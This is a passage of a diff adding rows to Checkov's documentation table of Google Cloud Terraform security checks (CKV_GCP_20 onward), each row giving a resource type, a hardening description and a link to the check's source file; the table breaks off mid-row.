+| 1614 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) |
+| 1615 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) |
+| 1616 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) |
+| 1617 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) |
+| 1618 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) |
+| 1619 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) |
+| 1620 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) |
+| 1621 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) |
+| 1622 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
+| 1623 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
+| 1624 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) |
+| 1625 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
+| 1626 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
+| 1627 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
+| 1628 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
+| 1629 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
+| 1630 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
+| 1631 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
+| 1632 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
+| 1633 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
+| 1634 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) |
+| 1635 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
+| 1636 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
+| 1637 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
+| 1638 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
+| 1639 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
+| 1640 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
+| 1641 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
+| 1642 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
+| 1643 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
+| 1644 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) |
+| 1645 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) |
+| 1646 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
+| 1647 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
+| 1648 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
+| 1649 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
+| 1650 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
+| 1651 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
+| 1652 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) |
+| 1653 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) |
+| 1654 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) |
+| 1655 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) |
+| 1656 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) |
+| 1657 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) |
+| 1658 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) |
+| 1659 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) |
+| 1660 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) |
+| 1661 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) |
+| 1662 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) |
+| 1663 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) |
+| 1664 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) |
+| 1665 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) |
+| 1666 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) |
+| 1667 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) |
+| 1668 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) |
+| 1669 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) |
+| 1670 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) |
+| 1671 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) |
+| 1672 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) |
+| 1673 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) |
+| 1674 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) |
+| 1675 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) |
+| 1676 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) |
+| 1677 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) |
+| 1678 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) |
+| 1679 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) |
+| 1680 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) |
+| 1681 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) |
+| 1682 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) |
+| 1683 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) |
+| 1684 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) |
+| 1685 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) |
+| 1686 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) |
+| 1687 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) |
+| 1688 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) |
+| 1689 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) |
+| 1690 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) |
+| 1691 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
+| 1692 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
+| 1693 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) |
+| 1694 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) |
+| 1695 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) |
+| 1696 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) |
+| 1697 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) |
+| 1698 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) |
+| 1699 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | [CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) |
+| 1700 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) |
+| 1701 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) |
+| 1702 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) |
+| 1703 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) |
+| 1704 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) |
+| 1705 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) |
+| 1706 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) |
+| 1707 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) |
+| 1708 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) |
+| 1709 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) |
+| 1710 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) |
+| 1711 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) |
+| 1712 | CKV_GCP_92 | resource | google_vertex_ai_dataset | Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) |
+| 1713 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) |
+| 1714 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) |
+| 1715 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) |
+| 1716 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) |
+| 1717 | CKV_GCP_97 | resource | google_redis_instance | Ensure 
